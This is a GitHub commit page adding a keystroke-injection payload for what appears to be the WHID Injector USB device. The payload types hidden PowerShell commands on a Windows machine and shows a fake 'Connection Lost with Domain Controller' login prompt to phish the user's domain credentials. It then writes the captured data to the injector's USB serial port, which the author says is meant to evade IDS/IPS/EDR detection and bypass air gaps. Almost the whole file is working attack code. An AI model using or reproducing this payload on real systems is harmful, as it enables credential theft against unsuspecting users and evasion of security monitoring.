Skip to content
Permalink
Browse files

Create Win_AD_Creds_Phishing_SerialExfil_AirGap_Bypass.txt

  • Loading branch information...
whid-injector committed Jun 7, 2019
1 parent 6cc75a9 commit b9fecf55643267c78548de24070a4e3d7361b2e8
Showing with 22 additions and 0 deletions.
  1. +22 −0 Payloads/Win_AD_Creds_Phishing_SerialExfil_AirGap_Bypass.txt
@@ -0,0 +1,22 @@
Rem: Tries to phish victim's AD credentials and exfiltrates them over Serial in order to avoid IDS/IPS/EDR detection.
Rem: This payload was written by Luca Bongiorni
Rem: You may need to adjust the delays depending on the hardware specs for the machine
Rem: Tested on Windows 10 Enterprise
DefaultDelay:500
Press:131+114
PrintLine:powershell
PrintLine:$ui=$Host.UI.RawUI;$ui.ForegroundColor=$ui.BackgroundColor;Clear
CustomDelay:500
PrintLine:$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName("WindowsBase")).GetType("MS.Win32.UnsafeNativeMethods"))::SetWindowPos($hw,$i,0,0,100,100,16512)
CustomDelay:1000
PrintLine:function antani
PrintLine:{[System.Reflection.Assembly]::LoadWithPartialName("System.web")
PrintLine:$cred = $Host.ui.PromptForCredential("Connection Lost with Domain Controller", "Please login again", "$env:userdomain\$env:username","")
PrintLine:$username = "$env:username"; $domain = "$env:userdomain"; $full = "$domain" + "\" + "$username"; $password = $cred.GetNetworkCredential().password
PrintLine:Add-Type -assemblyname System.DirectoryServices.AccountManagement
PrintLine:$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
PrintLine: $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password
PrintLine: $username = $output.UserName; $password = $output.password; $domain = $output.Domain; Send-Credentials($username, $password, $domain)}
PrintLine:function Send-Credentials($username, $password, $domain)
PrintLine:{$username = [System.Web.HttpUtility]::UrlEncode($username); $s=(Get-WmiObject -Class Win32_PnPEntity -Namespace "root\CIMV2" -Filter "PNPDeviceID like 'USB\\VID_1b4f&PID_9208%'").Caption; $com=[regex]::match($s,'\(([^\)]+)\)').Groups[1].Value; $port= new-Object System.IO.Ports.SerialPort $com,38400,None,8,one; $port.open(); $port.WriteLine("SerialEXFIL:$username"); $port.Close(); exit;}
PrintLine:antani

0 comments on commit b9fecf5

Please sign in to comment.
You can’t perform that action at this time.